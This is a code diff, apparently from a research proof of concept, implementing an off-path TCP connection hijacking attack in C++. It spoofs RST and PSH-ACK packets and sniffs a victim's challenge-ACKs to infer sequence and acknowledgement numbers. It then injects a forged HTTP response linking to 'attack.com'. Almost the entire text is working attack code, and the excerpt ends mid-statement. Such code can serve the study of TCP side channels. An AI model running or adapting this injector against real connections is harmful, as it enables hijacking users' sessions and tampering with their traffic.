+std::string dest_mac = "";
+std::string src_mac = "";
+
+
+void print_divider(int count) {
+  int i = 0;
+  while (i < count) {
+    cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
+    i++;
+  }
+}
+
+// Injects a malicious payload with the exact seq
+// and in-window ack inferred before
+//
+int inject_junk(long exact_seq, long in_win_ack) {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+
+  std::string message = "HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\nContent-Length: 84\r\nConnection: keep-alive\r\n\r\n<h1><a href=\"https://attack.com\">Just some junk here..</a></h1>";
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU(message);
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+
+  tcp.set_flag(TCP::PSH, 1);
+  tcp.set_flag(TCP::ACK, 1);
+  tcp.seq(exact_seq);
+  tcp.ack_seq(in_win_ack);
+
+  print_divider(2);
+  cout << "attempting to inject garbage into the connection..\n";
+  cout << "injected seq: " << exact_seq << ", in-win ack: " << in_win_ack << "\n";
+
+  sender.send(pkt, iface);
+  num_sent ++;
+
+  return 1;
+
+}
+
+
+// Send the same probe a number of times 
+// to see if the same amount of responses are 
+// triggered from the client
+//
+bool rechack(long seq, long ack, int num_checks) {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+  count_chacks = true;
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+
+  if (ack == 0) {
+    tcp.set_flag(TCP::RST, 1);
+  } else {
+    tcp.set_flag(TCP::PSH, 1);
+    tcp.set_flag(TCP::ACK, 1);
+    tcp.ack_seq(ack);
+  }
+
+
+  tcp.seq(seq);
+  chack_count = 0;
+  int count = 0;
+  usleep(1000000 / 2);
+
+  while (count < num_checks) {
+    sender.send(pkt, iface);
+    num_sent ++;
+    usleep(1000000 / 2 * 1.2); // must sleep half second due to chall-ack rate limit
+    count ++;
+  }
+
+  usleep(1000000);
+
+  // should have just sniffed as many chacks as we just sent
+  cout << "end of rechack, count was: " << chack_count << ", should be: " << num_checks << " \n";
+
+  if (chack_count >= num_checks) {
+    return true;
+  }
+
+  count_chacks = false;
+
+  return false;
+
+}
+
+
+// Use the fact the client will respond to empty PSH-ACKs
+// that have an in window ack AND a sequence number less than the exact
+// next expected sequence, with chall-acks to infer exact sequence num
+//
+long find_exact_seq(long in_win_seq, long in_win_ack, int send_delay) {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+
+  tcp.set_flag(TCP::PSH, 1);
+  tcp.set_flag(TCP::ACK, 1);
+  tcp.ack_seq(in_win_ack);
+
+  count_chacks = false;
+  track_nums = false;
+
+  long min_seq = in_win_seq - 200; // assuming the in_window_seq is within 200 of the left edge of window
+  sniffed_chack = false;
+  long curr_seq = in_win_seq;
+
+  // Continually decrement the in window sequence number
+  // until we sniff a chack which means we just passed the
+  // left edge of the sequence window
+  //
+  print_divider(1);
+  bool is_found = false;
+
+  while (!is_found) {
+
+    long j = curr_seq;
+    sniffed_chack = false;
+
+    while (j > min_seq && !sniffed_chack) {
+      usleep(send_delay);
+      cout << "spoofing with seq: " << j << "\n";
+
+      tcp.seq(j);
+      sender.send(pkt, iface);
+      num_sent ++;
+      j -= 1;
+    }
+
+    usleep(100000);
+    curr_seq = best_seq;
+    cout << "best seq at end of exact scan: " << curr_seq << "\n";
+
+    print_divider(1);
+    is_found = rechack(curr_seq, in_win_ack, 2);
+    if (show) cout << "exact seq was in win after rechack? " << is_found << "\n";
+
+  }
+
+  return curr_seq;
+}
+
+
+// Use the fact the client will respond to empty PSH-ACKs
+// that have an in window sequence number AND ack number less than the
+// ack number in use with chall-acks to infer an in-window ack number
+//
+long find_ack_block(long max_ack, long min_ack, long in_win_seq, long block_size, int send_delay, bool verbose, int chack_trigs) {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+
+  // Loop over ack space sending empty push-acks
+  // that use the in window sequence number found before
+  //
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport) / RawPDU("");
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+  tcp.set_flag(TCP::PSH, 1);
+  tcp.set_flag(TCP::ACK, 1);
+  tcp.seq(in_win_seq);
+
+  sniffed_chack = false;
+  chack_count = 0;
+  count_chacks = true;
+  track_nums = true;
+
+  current_min_ack = min_ack;
+  long j = max_ack;
+  long current_ack = 0;
+  best_ack = 0;
+
+
+  while (j > min_ack && chack_count < chack_trigs) { 
+    usleep(send_delay);
+
+    tcp.ack_seq(j);
+    sender.send(pkt, iface);
+    num_sent ++;
+
+    if (verbose && show) cout << "spoofing with ack: " << j << "\n";
+
+    if (j < 100000000) { // for tiny ack range
+      j -= block_size / 100;
+
+    } else {
+      j -= block_size;
+    }
+  }
+
+  usleep(100000);
+
+
+  for (int i = 0; i < possible_acks.size(); i ++) {
+    long cack = possible_acks[i];
+    if (cack > current_ack) current_ack = cack;
+
+  }
+  cout << "best ack at end of ack scan: " << current_ack << "\n";
+  track_nums = false;
+
+  return current_ack;
+}
+
+// Finds the "quiet" portion of the ack range to
+// start scanning and then begins to find an approx
+// ack block close to the one being used
+//
+long quack_spread(long in_win_seq) {
+
+  cout << "starting quack spread w seq: " << in_win_seq << "\n";
+
+  long start_ack_guess = 4294967294 / 2;
+  long end_ack_guess = 100;
+
+  long block_size = 100000000;
+  sniffed_chack = false; // assume its gonna find an ack here first
+
+
+  // if the actual ack is less than half of the max_ack allowed,
+  // then it will consider acks at the very top end of the ack space (~429.....)
+  // to be less than that small ack. therefore, we check if the max ack
+  // triggers chacks right away, if so then we half the start_ack guess (~214....)
+
+
+  bool triggering = rechack(in_win_seq, start_ack_guess, 3);
+
+  cout << "is ack in upper half? " << triggering << "\n";
+
+  if (triggering) { // then we know the ack is in the lower half of the ack space
+    start_ack_guess = start_ack_guess * 2;
+  }
+
+  long j = start_ack_guess;
+  sniffed_chack = false;
+  print_divider(1);
+
+  // Now continually decrement ack until we trigger another chack
+  //
+
+  int send_delay = 75000;
+  bool is_found = false;
+  long current_ack = 0;
+
+  while (!is_found) {
+
+    current_ack = find_ack_block(start_ack_guess, 0, in_win_seq, block_size, send_delay, true, 1);
+
+    cout << "finished quiet block spread, guessed quiet block ack: " << current_ack << "\n";
+    print_divider(1);
+
+    // recheck and send multiple to make sure we found correct ack block
+    is_found = rechack(in_win_seq, current_ack, 2);
+    if (show) cout << "was in win after rechack? " << is_found << "\n";
+
+    if (!is_found) start_ack_guess = current_ack;
+  }
+
+
+  return current_ack;
+}
+
+// Use the fact the client will respond to RSTs
+// with an in-window sequence number with chall-acks to
+// infer an in-window seq number
+//
+long find_seq_block(long prev_block_size, long new_block_size, long delay_mult, long send_delay, long top_seq) {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+
+  long max_seq = top_seq;
+  long adder = prev_block_size * delay_mult;
+
+  cout << "starting round " << current_round << " spread at: " << (max_seq - adder) << "\n";
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport);
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+  tcp.set_flag(TCP::RST, 1);
+
+  long i;
+
+  for (i = (max_seq - adder); i < max_seq; i += new_block_size) {
+    tcp.seq(i);
+    sender.send(pkt, iface);
+    num_sent ++;
+    usleep(send_delay);
+  }
+
+  cout << "finished round " << current_round << " spread, guessed in window seq: " << best_seq << "\n";
+
+  return best_seq;
+
+}
+
+
+// Attempt to sniff challenge acks while recording
+// the last sequence or ack number we spoofed
+//
+bool handle_packet(PDU &some_pdu) {
+
+  const IP &ip = some_pdu.rfind_pdu<IP>();
+
+  if (ack_search) {
+    // keep track of the last ack num we spoofed
+    if (ip.src_addr() == remote_addr) current_spoof_ack = some_pdu.rfind_pdu<TCP>().ack_seq();
+
+    if (ip.src_addr() == victim_wlan_addr) {
+
+      const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
+      //cout << payload << "\n";
+
+      if (payload == 115) { // each triggered chall-ack is 115 length SSL 
+        if (show) cout << "sniffed chack w ack: " << (current_spoof_ack) << "\n";
+        if (count_chacks) chack_count += 1;
+        if (track_nums) possible_acks.push_back(current_spoof_ack);
+        if (current_spoof_ack > current_min_ack) best_ack = current_spoof_ack;
+        sniffed_chack = true;
+      }
+    }
+
+  } else if (sniff_request == 1) {
+    // sniffing for a certain client request size (last step after finding seq and ack)
+    if (ip.src_addr() == victim_wlan_addr) {
+      const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
+      cout << "sniffed cli request of size " << payload << "\n";
+      if (payload == request_size) {
+        sniff_request = 2;
+      }
+    }
+
+  } else { // sniffing for chack during sequence search
+
+    // keep track of the last sequence num we spoofed
+    if (ip.src_addr() == remote_addr) current_spoof_seq = some_pdu.rfind_pdu<TCP>().seq();
+
+    if (ip.src_addr() == victim_wlan_addr) {
+
+      const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
+      //cout << payload << "\n";
+
+      if (payload == 115) { // each triggered chall-ack is 1 length15 SSL
+
+        if (show) cout << "sniffed chack w seq: " << (current_spoof_seq) << "\n";
+
+        if (track_nums) {
+          best_seq = current_spoof_seq;
+          possible_seqs.push_back(current_spoof_seq);
+        } else if (count_chacks) { //
+          chack_count += 1;
+          best_seq = current_spoof_seq;
+        } else {
+          if (!sniffed_chack) {
+
+            if (best_seq == 0) { // still in initial seq spread
+              best_seq = current_spoof_seq;
+              sniffed_chack = true;
+            } else {
+              // make sure new seq is less than the previous sniffed one
+              if (current_spoof_seq < best_seq) {
+                best_seq = current_spoof_seq;
+                sniffed_chack = true;
+              }
+            }
+
+          }
+        }
+
+      }
+
+    }
+  }
+
+  return true;
+}
+
+
+
+void sniff_stuff() {
+  SnifferConfiguration config;
+  config.set_promisc_mode(true);
+  Sniffer sniffer(interface, config);
+  sniffer.sniff_loop(handle_packet); // call the handle function for each sniffed pack
+}
+
+
+// Try to find an in window sequence number using
+// one of the very rough estimates found in the first
+// sequence spread
+long try_seq_block(long current_seq) {
+
+  // Just did round 1 spoofing fast to get rough estimate of
+  // in window sequence number, now we send a round 2 and 3 spreads
+  // using the approximated seq with lower send rates
+
+  current_round = 2;
+  sniffed_chack = false;
+  int wait_count = 0;
+  best_seq = current_seq;
+  usleep(1000000 / 2);
+
+  // this will take into account the last block size of 50k,
+  // skip in blocks of 1055 seq nums per send, assume the last
+  // rounds delay was 80 packets for a response, and send every 150 msecs
+  long s1 = find_seq_block(50000, 1055, 80, 150, current_seq);
+
+  while (best_seq == current_seq) {
+    usleep(500000);
+    if (show) cout << "waiting on round 2 chack..\n"; // return -1 if waiting too long
+    wait_count +=1;
+    if (wait_count > 5) return -1;
+  }
+
+  // Now we should have a close estimate to an in-window seq
+  // so next do a third scan at much slower rate to ensure its
+  // an in-window sequence num
+  print_divider(1);
+  usleep(1000000 / 2);
+
+  sniffed_chack = false;
+  current_round += 1;
+  current_seq = best_seq;
+  wait_count = 0;
+
+  long s2 = find_seq_block(1055, 20, 50, 600, current_seq); 
+
+  while (best_seq == current_seq) {
+    usleep(500000);
+    if (show) cout << "waiting on round 3 chack..\n";
+    wait_count +=1;
+    if (wait_count > 5) return -1;
+  }
+
+  return best_seq; 
+
+}
+
+// Gets rough estimate of sequence number in use
+// by spreading entire sequence range quickly then
+// tries to find in win sequence using each
+//
+long find_in_win_seq() {
+
+  PacketSender sender;
+  NetworkInterface iface(interface);
+
+  long start_seq_guess = 1;
+  long max_seq_num = 4294967295;
+  track_nums = true; // phase 1 is so fast it sniffs false seq nums so we try each
+
+  cout << "spreading the connections entire sequence number range...\n";
+  usleep(1000000 / 2);
+
+  IP pkt = IP(dest_ip, remote_addr) / TCP(dport, sport);
+  TCP& tcp = pkt.rfind_pdu<TCP>();
+  tcp.set_flag(TCP::RST, 1);
+
+  long i;
+
+  for (i = start_seq_guess; i <  max_seq_num; i += 50000) { // sends to the whole sequence num space
+    tcp.seq(i);
+    sender.send(pkt, iface);
+    num_sent ++;
+    usleep(10);
+  }
+  usleep(1000000);
+  cout << "finished round 1 spread, guessed in window seq: " << best_seq << "\n";
+
+  track_nums = false;
+  int j = 0;
+  long in_win_seq = -1;
+
+  while (j < possible_seqs.size() && in_win_seq == -1) { // try each possible seq block
+    print_divider(1);
+    current_round = 0;
+    if (show) cout << "trying to find in window seq around " << possible_seqs[j] << "\n";
+    in_win_seq = try_seq_block(possible_seqs[j]);
+    j ++;
+    if (show) cout << "in win seq after try? " << in_win_seq << "\n";
+    usleep(1000000 / 2);
+  }
+
+
+  possible_seqs.clear();
+  track_nums = false;
+
+  print_divider(1);
+  usleep(1000000 / 2);
+
+  return best_seq;
+
+}
+
+
+// Send two spoof rounds while increasing the send delay and
+// decreasing block size to quickly get in-win ack estimate
+//
+long find_in_win_ack(long in_win_seq) {
+
+  // quack should be below current ack in use but we only rechack once first round
+  ack_search = true;
+  long quack = quack_spread(in_win_seq);
+
+  // Spoof empty PSH-ACKs starting at 'quack' plus some send delay
+  // until we sniff a chack and know we just went below the left
+  // edge of the ack window
+  usleep(1000000);
+  print_divider(1);
+  possible_acks.clear();
+
+  long block_size = 10000;
+  int send_delay = 500; 
+  long max_ack = quack + (1 * 100000000);
+  long min_ack = quack;
+  long clack;
+
+  bool is_found = false;
+
+  while (!is_found) { // retry ack scan until we find block triggering chacks
+
+    cout << "starting round 1 ack scan w min: " << min_ack << " and max: " << max_ack << "<